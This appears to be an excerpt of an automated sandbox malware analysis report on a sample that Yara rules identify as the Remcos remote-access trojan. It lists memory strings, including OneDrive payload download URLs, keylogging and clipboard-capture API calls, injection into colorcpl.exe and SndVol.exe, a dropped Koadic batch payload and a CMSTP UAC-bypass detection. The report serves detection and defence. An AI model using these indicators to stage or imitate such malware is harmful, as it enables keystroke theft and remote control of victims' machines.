Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe, 00000005.00000003.2049864957.000000000046A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
Source: colorcpl.exe, 00000005.00000003.2049864957.000000000046A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/#Y
Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.00000000003E4000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: colorcpl.exe, 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpJ6
Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpX
Source: colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpc6
Source: colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpm6
Source: colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp~6
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com
Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gjc1pa.dm.files.1drv.com/
Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gjc1pa.dm.files.1drv.com/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WShCc-
Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gjc1pa.dm.files.1drv.com/y4mpj9fRwfOnuyzM7YwI58jRvZ-dYfMjomP1KUnTARA567zRfUcLOtOoq9VQbjgVxqr
Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gjc1pa.dm.files.1drv.com:443/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WS
Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://live.com/
Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.000000000078A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/J
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013C40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?resid=38773C188FECDED2%21107&authkey=
Source: XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.5:49705 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0466A2B8 SetWindowsHookExA 0000000D,0466A2A4,00000000 | 5_2_0466A2B8
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0466B70E OpenClipboard,GetClipboardData,CloseClipboard, | 5_2_0466B70E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_046768C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 5_2_046768C1
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_1C6468C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 8_2_1C6468C1
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0466B70E OpenClipboard,GetClipboardData,CloseClipboard, | 5_2_0466B70E
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0466A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, | 5_2_0466A3E0

E-Banking Fraud

Source: Yara match | File source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\ffrrdds\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0467C9E2 SystemParametersInfoW, | 5_2_0467C9E2
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_1C64C9E2 SystemParametersInfoW, | 8_2_1C64C9E2

System Summary

Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\Public\Libraries\OcihlomcO.bat, type: DROPPED | Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: netutils.dll.0.dr | Static PE information: section name: .
Source: C:\Windows\SysWOW64\colorcpl.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\XY2I8rWLkM.exe | Code function: 0_2_028BC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, | 0_2_028BC3F8
